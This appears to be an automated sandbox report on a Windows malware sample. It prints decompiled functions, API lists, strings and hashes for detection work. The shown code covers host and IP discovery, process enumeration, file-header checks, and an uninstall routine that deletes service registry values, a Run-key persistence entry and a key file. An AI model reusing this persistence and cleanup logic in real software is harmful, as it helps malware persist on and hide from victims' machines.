0x10007cea
0x00000000
0x00000000
0x10007cf0
0x10007cf2
0x10007cf5
0x10007d08
0x10007d1c
0x10007d2c
0x10007d34
0x10007d3e
0x10007d3f
0x10007d3f
0x10007d41
0x10007d43
0x10007d44
0x10007d51
0x10007d57
0x10007d7d
0x10007d88
0x10007d8d
0x00000000
0x00000000
0x10007d8f
0x10007d92
0x10007d99
0x00000000
0x00000000
0x10007d9b
0x10007da1
0x10007da6
0x10007db3
0x00000000
0x00000000
0x10007dc0
0x10007dc5
0x10007dc8
0x10007dcd
0x00000000
0x00000000
0x00000000
0x10007dcd
0x10007dcf
0x10007dd2
0x10007dd2
0x10007dd5
0x10007dd9
0x10007dd9
0x10007ddf
0x10007def
0x10007df3
0x10007df3
0x00000000
0x10007cf5
0x10007e08

APIs

OutputDebugStringA.KERNEL32(100246E8), ref: 10007AE7

Part of subcall function 10007A9F: WSAStartup.WS2_32(00000202,?), ref: 10007AB4

gethostname.WS2_32(?,00000080), ref: 10007CC8
gethostbyname.WS2_32(?), ref: 10007CDD
memset.MSVCRT ref: 10007D08
memcpy.MSVCRT ref: 10007D1C
memset.MSVCRT ref: 10007D57
wsprintfA.USER32 ref: 10007D7D
Sleep.KERNEL32(000000C8), ref: 10007DA6
WSACleanup.WS2_32 ref: 10007DFB

Strings

%d.%d.%d.%d, xrefs: 10007D77
administrator, xrefs: 10007AEF, 10007D83, 10007DBD

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: memset$CleanupDebugOutputSleepStartupStringgethostbynamegethostnamememcpywsprintf
String ID: %d.%d.%d.%d$administrator
API String ID: 1751358652-1428303968
Opcode ID: c38b030b87c0fae78af68c71b1a7023ed02742dfe0052b406d2e80d029c0681a
Instruction ID: 8c402ffff6332d3e412f82d06c36ae22299ce7a2807f1c468dc3fdcfd1c362c3
Opcode Fuzzy Hash: c38b030b87c0fae78af68c71b1a7023ed02742dfe0052b406d2e80d029c0681a
Instruction Fuzzy Hash: C181E8B5C152E89BDB20CF94EC406DDBBB8FF06340FD24199D56A6B200CBBA5A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 10014204, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 160
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10014204(void* _a4, signed short _a6, signed int* _a8, signed short _a10, long* _a12, intOrPtr* _a16, signed int* _a20) {
				void _v6;
				signed int _v9;
				signed int _v10;
				signed int _v12;
				long _v16;
				long _v20;
				void _v24;
				void _v28;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v72;
				struct _BY_HANDLE_FILE_INFORMATION _v80;
				signed int _t71;
				signed int _t73;
				long _t74;
				signed int* _t75;
				long* _t76;
				long _t95;
				void _t100;
				signed char _t105;
				signed int _t111;
				void* _t112;
				intOrPtr* _t115;
				signed int* _t116;
				void* _t119;

				_t112 = _a4;
				if(GetFileInformationByHandle(_t112,  &_v80) == 0) {
					return 0x200;
				}
				_t105 = _v80.dwFileAttributes;
				_t71 = 1;
				_t111 = _t105 & _t71;
				_v12 = 0;
				if(_t111 != 0) {
					_v12 = _t71;
				}
				if((_t105 & 0x00000002) != 0) {
					_v12 = _v12 | 0x00000002;
				}
				if((_t105 & 0x00000004) != 0) {
					_v12 = _v12 | 0x00000004;
				}
				_t73 = _t105 & 0x00000010;
				if(_t73 != 0) {
					_v12 = _v12 | 0x00000010;
				}
				if((_t105 & 0x00000020) != 0) {
					_v12 = _v12 | 0x00000020;
				}
				if(_t73 == 0) {
					_v9 = _v9 | 0x00000080;
				} else {
					_v9 = _v9 | 0x00000040;
				}
				_v9 = _v9 | 0x00000001;
				if(_t111 == 0) {
					_v10 = _v10 | 0x00000080;
				}
				_t74 = GetFileSize(_t112, 0);
				_v20 = _t74;
				if(_t74 > 0x28) {
					SetFilePointer(_t112, 0, 0, 0);
					ReadFile(_t112,  &_v6, 2,  &_v16, 0);
					SetFilePointer(_a4, 0x24, 0, 0);
					ReadFile(_a4,  &_v24, 4,  &_v16, 0);
					if(_v6 == 0x54ad) {
						_t95 = _v24;
						if(_v20 > _t95 + 0x34) {
							SetFilePointer(_a4, _t95, 0, 0);
							ReadFile(_a4,  &_v28, 4,  &_v16, 0);
							_t100 = _v28;
							if(_t100 == 0x5a4d || _t100 == 0x454e || _t100 == 0x454c || _t100 == 0x4550) {
								_v10 = _v10 | 0x00000040;
							}
						}
					}
				}
				_t75 = _a8;
				if(_t75 != 0) {
					 *_t75 = _v12;
				}
				_t76 = _a12;
				if(_t76 != 0) {
					 *_t76 = _v20;
				}
				_t115 = _a16;
				if(_t115 != 0) {
					 *_t115 = E10014183(_v80.ftLastAccessTime, _v64);
					 *(_t115 + 4) = _t111;
					 *((intOrPtr*)(_t115 + 8)) = E10014183(_v80.ftLastWriteTime, _v56);
					 *(_t115 + 0xc) = _t111;
					 *((intOrPtr*)(_t115 + 0x10)) = E10014183(_v80.ftCreationTime, _v72);
					_t119 = _t119 + 0x18;
					 *(_t115 + 0x14) = _t111;
				}
				_t116 = _a20;
				if(_t116 != 0) {
					E100141A7(_v80.ftLastWriteTime, _v56,  &_a6,  &_a10);
					 *_t116 = (_a6 & 0x0000ffff) << 0x00000010 | _a10 & 0x0000ffff;
				}
				return 0;
			}

0x1001420b
0x1001421b
0x00000000
0x1001421d
0x10014227
0x10014230
0x10014233
0x10014235
0x10014238
0x1001423a
0x1001423a
0x10014240
0x10014242
0x10014242
0x10014249
0x1001424b
0x1001424b
0x10014251
0x10014254
0x10014256
0x10014256
0x1001425d
0x1001425f
0x1001425f
0x10014265
0x1001426d
0x10014267
0x10014267
0x10014267
0x10014271
0x10014277
0x10014279
0x10014279
0x1001427f
0x10014288
0x1001428b
0x1001429b
0x100142af
0x100142b8
0x100142c8
0x100142d0
0x100142d2
0x100142db
0x100142e3
0x100142f3
0x100142f5
0x100142fd
0x10014314
0x10014314
0x100142fd
0x100142db
0x100142d0
0x10014318
0x1001431d
0x10014322
0x10014322
0x10014324
0x10014329
0x1001432e
0x1001432e
0x10014330
0x10014335
0x10014345
0x10014347
0x10014355
0x10014358
0x10014363
0x10014366
0x10014369
0x10014369
0x1001436c
0x10014371
0x10014381
0x10014396
0x10014396
0x00000000

APIs

GetFileInformationByHandle.KERNEL32(?,?), ref: 10014213
GetFileSize.KERNEL32(?,00000000), ref: 1001427F
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 1001429B
ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 100142AF
SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 100142B8
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 100142C8
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 100142E3
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 100142F3

Strings

@, xrefs: 10014314
, xrefs: 1001425F
@, xrefs: 10014267

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: File$PointerRead$HandleInformationSize
String ID: $@$@
API String ID: 2979504256-3743272326
Opcode ID: 618dd05fd6fc5c6a25a301b63ff4eda090c0ea259dcf930be55a07fcef707d31
Instruction ID: 11292a7b2910009db30e205128b3eeb6919349bbed12eca6d453da078a4de307
Opcode Fuzzy Hash: 618dd05fd6fc5c6a25a301b63ff4eda090c0ea259dcf930be55a07fcef707d31
Instruction Fuzzy Hash: 5B5139B190020DBFEB11DF94CC819AEBBF9EF44394F528469F911AB160DB70DE818B60

Uniqueness

Uniqueness Score: -1.00%

Function 10004C3F, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 68
registrystringfileCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E10004C3F() {
				void* _v8;
				void* _v12;
				void _v56;
				intOrPtr _v60;
				char _v64;
				char _v100;
				char _v360;
				struct _OSVERSIONINFOA _v508;
				char _t64;
				intOrPtr _t65;
				void* _t69;
				signed int _t81;
				signed int _t84;
				void* _t97;
				void* _t103;
				void* _t104;
				void* _t107;

				_pop(_t90);
				_pop(_t79);
				_t104 = _t103 - 0x1f8;
				_push(_t97);
				if( *0x10027408 != 2) {
					_t81 = 8;
					memcpy( &_v100, "SYSTEM\\CurrentControlSet\\Services", _t81 << 2);
					_v12 = 0;
					_v8 = 0;
					asm("movsw");
					RegOpenKeyExA(0x80000001,  &_v100, 0, 0xf003f,  &_v8);
					E1000D502(0x80000001,  &_v100, "Vwxyab Defghijk", 0, 0, 0, 2);
					_t104 = _t104 + 0x28;
					RegDeleteValueA(_v8, "Group");
					RegDeleteValueA(_v8, "Remark");
					RegDeleteValueA(_v8, "InstallTime");
					RegCloseKey(_v8);
					RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0xf003f,  &_v12);
					RegDeleteValueA(_v12, "SVP7");
					RegCloseKey(_v12);
				} else {
					E100032B8(_t97, "Vwxyab Defghijk");
				}
				 *0x100273bc(0,  &_v360, 0x1c, 0);
				if(PathFileExistsA( &_v360) == 0) {
					PathStripToRootA( &_v360);
					strcat( &_v360, "Windows\\");
					strcat( &_v360, "Fatal");
					_push(".key");
				} else {
					strcat( &_v360, "\\");
					strcat( &_v360, "Fatal");
					_push(".key");
				}
				strcat( &_v360, ??);
				DeleteFileA( &_v360);
				_t64 = "cmd.exe"; // 0x2e646d63
				_v64 = _t64;
				_t65 =  *0x100240d8; // 0x657865
				_v60 = _t65;
				_t84 = 0xa;
				memset( &_v56, 0, _t84 << 2);
				_t107 = _t104 + 0x24;
				asm("stosw");
				while(1) {
					_t69 = E10004A35( &_v64);
					_pop(_t86);
					if(_t69 == 0) {
						break;
					}
					_v12 = _t107;
					_push( &_v64);
					L10015818();
					E1000490A();
				}
				E10004AFD();
				_v508.dwOSVersionInfoSize = 0x94;
				GetVersionExA( &_v508);
				if(_v508.dwPlatformId == 2 && _v508.dwMajorVersion >= 6) {
					 *0x100275b0 = 1;
				}
				ExitProcess(0);
			}

0x10004c3f
0x10004c40
0x10004c44
0x10004c52
0x10004c54
0x10004c6d
0x10004c71
0x10004c84
0x10004c87
0x10004c8b
0x10004c97
0x10004caa
0x10004cb5
0x10004cc0
0x10004cca
0x10004cd4
0x10004cd9
0x10004cf0
0x10004cfa
0x10004cff
0x10004c56
0x10004c5b
0x10004c60
0x10004d12
0x10004d27
0x10004d59
0x10004d6b
0x10004d7c
0x10004d81
0x10004d29
0x10004d35
0x10004d46
0x10004d4b
0x10004d4b
0x10004d8d
0x10004d9c
0x10004da2
0x10004da9
0x10004dac
0x10004db1
0x10004db4
0x10004dba
0x10004dba
0x10004dbc
0x10004dbe
0x10004dc2
0x10004dc9
0x10004dca
0x00000000
0x00000000
0x10004dd2
0x10004dd5
0x10004dd6
0x10004ddb
0x10004de0
0x10004de3
0x10004dee
0x10004df9
0x10004e06
0x10004e11
0x10004e11
0x10004e1c

APIs

RegOpenKeyExA.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 10004C97
RegDeleteValueA.ADVAPI32(?,Group), ref: 10004CC0
RegDeleteValueA.ADVAPI32(?,Remark), ref: 10004CCA
RegDeleteValueA.ADVAPI32(?,InstallTime), ref: 10004CD4
RegCloseKey.ADVAPI32(?), ref: 10004CD9
RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 10004CF0
RegDeleteValueA.ADVAPI32(?,SVP7), ref: 10004CFA
RegCloseKey.ADVAPI32(?), ref: 10004CFF
SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000), ref: 10004D12
PathFileExistsA.SHLWAPI(?), ref: 10004D1F
strcat.MSVCRT(?,100240B4), ref: 10004D35
strcat.MSVCRT(?,Fatal,?,100240B4), ref: 10004D46
strcat.MSVCRT(?,.key,?,Fatal,?,Windows\), ref: 10004D8D
DeleteFileA.KERNEL32(?), ref: 10004D9C

Part of subcall function 100032B8: lstrlenA.KERNEL32(?), ref: 100032BE
Part of subcall function 100032B8: OpenSCManagerA.ADVAPI32(00000000,00000000,?), ref: 100032DD
Part of subcall function 100032B8: OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 100032F3
Part of subcall function 100032B8: DeleteService.ADVAPI32(00000000), ref: 10003300
Part of subcall function 100032B8: CloseServiceHandle.ADVAPI32(00000000), ref: 10003307
Part of subcall function 100032B8: CloseServiceHandle.ADVAPI32(00000000), ref: 1000330E

Strings

Fatal, xrefs: 10004D40
.key, xrefs: 10004D4B
Vwxyab Defghijk, xrefs: 10004C56
cmd.exe, xrefs: 10004DA2

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Delete$CloseOpenServiceValue$strcat$FileHandlePath$ExistsFolderManagerSpeciallstrlen
String ID: .key$Fatal$Vwxyab Defghijk$cmd.exe
API String ID: 1282405606-3973914339
Opcode ID: 578090f4bae494b6195378b4e41b937c3358d4d2787dc34d4ad72dadf9a20100
Instruction ID: 994c4b908f558da002e64861c77975be6b4398967b56d61eff608c2f524edb50
Opcode Fuzzy Hash: 578090f4bae494b6195378b4e41b937c3358d4d2787dc34d4ad72dadf9a20100
Instruction Fuzzy Hash: 58117FB6D00218FBEB14EBA4DDC5DCF77BCEF04380F520166FA04A6114DF31AA898A65

Uniqueness

Uniqueness Score: -1.00%

Function 1000D1AA, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 60
libraryloaderstringCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E1000D1AA(CHAR* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v276;
				char _v312;
				_Unknown_base(*)()* _t15;
				_Unknown_base(*)()* _t17;
				void* _t23;
				struct HINSTANCE__* _t28;
				void* _t30;

				_t28 = LoadLibraryA("kernel32.dll");
				_t15 = GetProcAddress(_t28, "CreateToolhelp32Snapshot");
				_v12 = GetProcAddress(_t28, "Process32First");
				_t17 = GetProcAddress(_t28, "Process32Next");
				_v8 = _v8 & 0x00000000;
				_v16 = _t17;
				_t30 =  *_t15(2, 0);
				if(_t30 != 0) {
					_v312 = 0x128;
					_t23 = _v12(_t30,  &_v312);
					while(_t23 != 0) {
						if(lstrcmpiA(_a4,  &_v276) == 0) {
							_v8 = 1;
						} else {
							_t23 = _v16(_t30,  &_v312);
							continue;
						}
						goto L6;
					}
				}
				L6:
				CloseHandle(_t30);
				if(_t28 != 0) {
					FreeLibrary(_t28);
				}
				return _v8;
			}

0x1000d1c7
0x1000d1cf
0x1000d1e1
0x1000d1e4
0x1000d1e6
0x1000d1ee
0x1000d1f3
0x1000d1f7
0x1000d1ff
0x1000d20b
0x1000d20e
0x1000d224
0x1000d233
0x1000d226
0x1000d22e
0x00000000
0x1000d22e
0x00000000
0x1000d224
0x1000d20e
0x1000d23a
0x1000d23b
0x1000d243
0x1000d246
0x1000d246
0x1000d253

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 1000D1BB
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 1000D1CF
GetProcAddress.KERNEL32(00000000,Process32First), ref: 1000D1D9
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 1000D1E4
lstrcmpiA.KERNEL32(?,?), ref: 1000D21C
CloseHandle.KERNEL32(00000000), ref: 1000D23B
FreeLibrary.KERNEL32(00000000), ref: 1000D246

Strings

kernel32.dll, xrefs: 1000D1B6
CreateToolhelp32Snapshot, xrefs: 1000D1C9
Process32First, xrefs: 1000D1D1
Process32Next, xrefs: 1000D1DB

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: AddressProc$Library$CloseFreeHandleLoadlstrcmpi
String ID: CreateToolhelp32Snapshot$Process32First$Process32Next$kernel32.dll
API String ID: 1314729832-4285911020
Opcode ID: 936a3f2a47abbf956d202535eefbb982db76719e78453b5517661ad35c4b25ef
Instruction ID: d0fe3d43155aa918f6932b90fde921801bcc5843b6625958336a641336c320f4
Opcode Fuzzy Hash: 936a3f2a47abbf956d202535eefbb982db76719e78453b5517661ad35c4b25ef
Instruction Fuzzy Hash: FB117031D01228BBEB21EB65CC89BEEBBBCEF48791F404056F905E2144D774EB40CA65

Uniqueness

Uniqueness Score: -1.00%

Function 1000CC7C, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 53
librarystringloaderCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E1000CC7C(CHAR* _a4) {
				_Unknown_base(*)()* _t6;
				struct tagPROCESSENTRY32W _t7;
				int _t8;
				void* _t12;
				CHAR* _t18;
				struct tagPROCESSENTRY32W _t19;

				_t6 = GetProcAddress(LoadLibraryA("KERNEL32.dll"), "CreateToolhelp32Snapshot");
				_t7 =  *_t6(2, 0);
				_t12 = _t7;
				_push(0x128);
				L10015806();
				_t19 = _t7;
				 *_t19 = 0x128;
				_t8 = Process32First(_t12, _t19);
				if(_t8 == 0) {
					L6:
					_push(_t19);
					L10015800();
					return 0;
				}
				_t2 = _t19 + 0x24; // 0x24
				_t18 = _t2;
				__imp___strcmpi(_t18, _a4);
				while(_t8 != 0) {
					if(Process32Next(_t12, _t19) == 0) {
						goto L6;
					}
					_t8 = lstrcmpiA(_t18, _a4);
				}
				return  *((intOrPtr*)(_t19 + 8));
			}

0x1000cc93
0x1000cc9d
0x1000cca4
0x1000cca6
0x1000cca7
0x1000ccad
0x1000ccb1
0x1000ccb3
0x1000ccba
0x1000cceb
0x1000cceb
0x1000ccec
0x00000000
0x1000ccf2
0x1000ccbf
0x1000ccbf
0x1000ccc3
0x1000cce2
0x1000ccd6
0x00000000
0x00000000
0x1000ccdc
0x1000ccdc
0x00000000

APIs

LoadLibraryA.KERNEL32(KERNEL32.dll,CreateToolhelp32Snapshot,00000001,00000000,Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij,?,100028F7,?), ref: 1000CC8C
GetProcAddress.KERNEL32(00000000), ref: 1000CC93
#823.MFC42(00000128,?,100028F7,?), ref: 1000CCA7
Process32First.KERNEL32(00000000,00000000), ref: 1000CCB3
_strcmpi.MSVCRT ref: 1000CCC3
Process32Next.KERNEL32 ref: 1000CCCF
lstrcmpiA.KERNEL32(00000024,00000000,00000000,00000000,?), ref: 1000CCDC
#825.MFC42(00000000,00000000,00000000,?,100028F7,?), ref: 1000CCEC

Strings

KERNEL32.dll, xrefs: 1000CC87
CreateToolhelp32Snapshot, xrefs: 1000CC82
Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij, xrefs: 1000CC7F

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Process32$#823#825AddressFirstLibraryLoadNextProc_strcmpilstrcmpi
String ID: CreateToolhelp32Snapshot$KERNEL32.dll$Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij
API String ID: 1791652098-2081920179
Opcode ID: a157ccba2ca5391096263d4fef31a502154ebb29f052355c64ecdc56ef0fc656
Instruction ID: 69ff8049d7196bb17128d5a75f148d677afba39a3fc62441a7aaebc993ea7ff3
Opcode Fuzzy Hash: a157ccba2ca5391096263d4fef31a502154ebb29f052355c64ecdc56ef0fc656
Instruction Fuzzy Hash: 54018632204315BBF7149B62ED89EAF3BACDF457A1B614429F90DE9081DF31E8418764

Uniqueness

Uniqueness Score: -1.00%

Function 0040A471, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 56
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A471(intOrPtr* __ecx, intOrPtr _a4) {
				void* __ebp;
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t15;
				void* _t16;
				intOrPtr* _t18;
				char _t19;
				intOrPtr _t21;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t23;

				_t12 = __ecx;
				_t18 = __ecx;
				 *__ecx = _a4;
				_a4 = 0;
				_t19 =  *0x450c9c; // 0x0
				if(_t19 == 0) {
					_t15 = GetModuleHandleA("KERNEL32");
					if(_t15 == 0) {
						L2:
						E00415838(_t12);
					}
					 *0x450c8c = GetProcAddress(_t15, "CreateActCtxA");
					 *0x450c90 = GetProcAddress(_t15, "ReleaseActCtx");
					 *0x450c94 = GetProcAddress(_t15, "ActivateActCtx");
					_t9 = GetProcAddress(_t15, "DeactivateActCtx");
					_t21 =  *0x450c8c; // 0x0
					 *0x450c98 = _t9;
					_t16 = _t16;
					if(_t21 == 0) {
						__eflags =  *0x450c90; // 0x0
						if(__eflags != 0) {
							goto L2;
						} else {
							__eflags =  *0x450c94; // 0x0
							if(__eflags != 0) {
								goto L2;
							} else {
								__eflags = _t9;
								if(_t9 != 0) {
									goto L2;
								}
							}
						}
					} else {
						_t22 =  *0x450c90; // 0x0
						if(_t22 == 0) {
							goto L2;
						} else {
							_t23 =  *0x450c94; // 0x0
							if(_t23 == 0) {
								goto L2;
							} else {
								if(_t9 == 0) {
									goto L2;
								}
							}
						}
					}
					 *0x450c9c = 1;
				}
				return _t18;
			}

APIs

GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,0040AF45,000000FF), ref: 0040A493
GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 0040A4B1
GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 0040A4BE
GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 0040A4CB
GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 0040A4D8

Strings

DeactivateActCtx, xrefs: 0040A4CD
ReleaseActCtx, xrefs: 0040A4B3
ActivateActCtx, xrefs: 0040A4C0
CreateActCtxA, xrefs: 0040A4AB
KERNEL32, xrefs: 0040A48E

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 667068680-3617302793
Opcode ID: 96203baa230df5da1a45adee60155c894b823ff8c2b8d06b44f0905554ffa9d5
Instruction ID: 57158f2fb09f2e5bca614e5f684be6b8f22036b14f88b861c83f32c1704082e2
Opcode Fuzzy Hash: 96203baa230df5da1a45adee60155c894b823ff8c2b8d06b44f0905554ffa9d5
Instruction Fuzzy Hash: 9F1106789013409FCB26EF657C8A41B7B94A756716710057FF108D3262EAB898A0CE0E

Uniqueness

Uniqueness Score: -1.00%

Function 0040C7B2, Relevance: 16.6, APIs: 11, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040C7B2(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t54;
				void* _t58;
				signed int _t59;
				signed int _t63;
				signed short _t71;
				signed int _t84;
				void* _t97;
				struct HINSTANCE__* _t99;
				signed int _t100;
				void* _t101;
				intOrPtr* _t103;
				void* _t104;
				void* _t105;

				_t105 = __eflags;
				_t97 = __edx;
				_push(0x24);
				E0042720D(E00439A9C, __ebx, __edi, __esi);
				_t103 = __ecx;
				 *((intOrPtr*)(_t104 - 0x20)) = __ecx;
				 *(_t104 - 0x1c) =  *(__ecx + 0x60);
				 *(_t104 - 0x18) =  *(__ecx + 0x5c);
				_t54 = E0040E67F(__ebx, __edi, __ecx, _t105);
				_t99 =  *(_t54 + 0xc);
				_t84 = 0;
				_t106 =  *(_t103 + 0x58);
				if( *(_t103 + 0x58) != 0) {
					_t99 =  *(E0040E67F(0, _t99, _t103, _t106) + 0xc);
					_t54 = LoadResource(_t99, FindResourceA(_t99,  *(_t103 + 0x58), 5));
					 *(_t104 - 0x18) = _t54;
				}
				if( *(_t104 - 0x18) != _t84) {
					_t54 = LockResource( *(_t104 - 0x18));
					 *(_t104 - 0x1c) = _t54;
				}
				if( *(_t104 - 0x1c) != _t84) {
					 *(_t104 - 0x14) = E0040C30C(_t84, _t103, __eflags);
					E00410EEA(_t84, _t99, _t103, __eflags);
					 *(_t104 - 0x28) =  *(_t104 - 0x28) & _t84;
					__eflags =  *(_t104 - 0x14) - _t84;
					 *(_t104 - 0x2c) = _t84;
					 *(_t104 - 0x24) = _t84;
					if(__eflags != 0) {
						__eflags =  *(_t104 - 0x14) - GetDesktopWindow();
						if(__eflags != 0) {
							__eflags = IsWindowEnabled( *(_t104 - 0x14));
							if(__eflags != 0) {
								EnableWindow( *(_t104 - 0x14), 0);
								 *(_t104 - 0x2c) = 1;
								_t84 = E0040A3FC();
								__eflags = _t84;
								 *(_t104 - 0x24) = _t84;
								if(__eflags != 0) {
									__eflags =  *((intOrPtr*)( *_t84 + 0x120))();
									if(__eflags != 0) {
										__eflags = E00415A74(_t84);
										if(__eflags != 0) {
											E00415A8F(_t84, 0);
											 *(_t104 - 0x28) = 1;
										}
									}
								}
							}
						}
					}
					 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
					E004128B9(_t84, _t99, __eflags, _t103);
					_t58 = E00410E42(_t84, _t104,  *(_t104 - 0x14));
					_push(_t99);
					_push(_t58);
					_push( *(_t104 - 0x1c));
					_t59 = E0040C5C2(_t84, _t103, _t97, _t99, _t103, __eflags);
					_t100 = 0;
					__eflags = _t59;
					if(_t59 != 0) {
						__eflags =  *(_t103 + 0x3c) & 0x00000010;
						if(( *(_t103 + 0x3c) & 0x00000010) != 0) {
							_t101 = 4;
							_t71 = E00415985(_t103);
							__eflags = _t71 & 0x00000100;
							if((_t71 & 0x00000100) != 0) {
								_t101 = 5;
							}
							E004109D8(_t103, _t97, _t101);
							_t100 = 0;
							__eflags = 0;
						}
						__eflags =  *((intOrPtr*)(_t103 + 0x20)) - _t100;
						if( *((intOrPtr*)(_t103 + 0x20)) != _t100) {
							E00415C39(_t103, _t100, _t100, _t100, _t100, _t100, 0x97);
						}
					}
					 *(_t104 - 4) =  *(_t104 - 4) | 0xffffffff;
					__eflags =  *(_t104 - 0x28) - _t100;
					if( *(_t104 - 0x28) != _t100) {
						E00415A8F(_t84, 1);
					}
					__eflags =  *(_t104 - 0x2c) - _t100;
					if( *(_t104 - 0x2c) != _t100) {
						EnableWindow( *(_t104 - 0x14), 1);
					}
					__eflags =  *(_t104 - 0x14) - _t100;
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t103 + 0x20));
						if(__eflags == 0) {
							SetActiveWindow( *(_t104 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t103 + 0x60))();
					E0040C346(_t84, _t103, _t100, _t103, __eflags);
					__eflags =  *(_t103 + 0x58) - _t100;
					if( *(_t103 + 0x58) != _t100) {
						FreeResource( *(_t104 - 0x18));
					}
					_t63 =  *(_t103 + 0x44);
					goto L31;
				} else {
					_t63 = _t54 | 0xffffffff;
					L31:
					return E004272B2(_t63);
				}
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 0040C7B9
FindResourceA.KERNEL32(?,?,00000005), ref: 0040C7EC
LoadResource.KERNEL32(?,00000000), ref: 0040C7F4
LockResource.KERNEL32(?,00000024,004010BD), ref: 0040C805
GetDesktopWindow.USER32 ref: 0040C838
IsWindowEnabled.USER32(?), ref: 0040C846
EnableWindow.USER32(?,00000000), ref: 0040C855

Part of subcall function 00415A74: IsWindowEnabled.USER32(?), ref: 00415A7D

Part of subcall function 00415A8F: EnableWindow.USER32(?,?), ref: 00415A9C

EnableWindow.USER32(?,00000001), ref: 0040C931
GetActiveWindow.USER32 ref: 0040C93C
SetActiveWindow.USER32(?,?,00000024,004010BD), ref: 0040C94A
FreeResource.KERNEL32(?,?,00000024,004010BD), ref: 0040C966

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
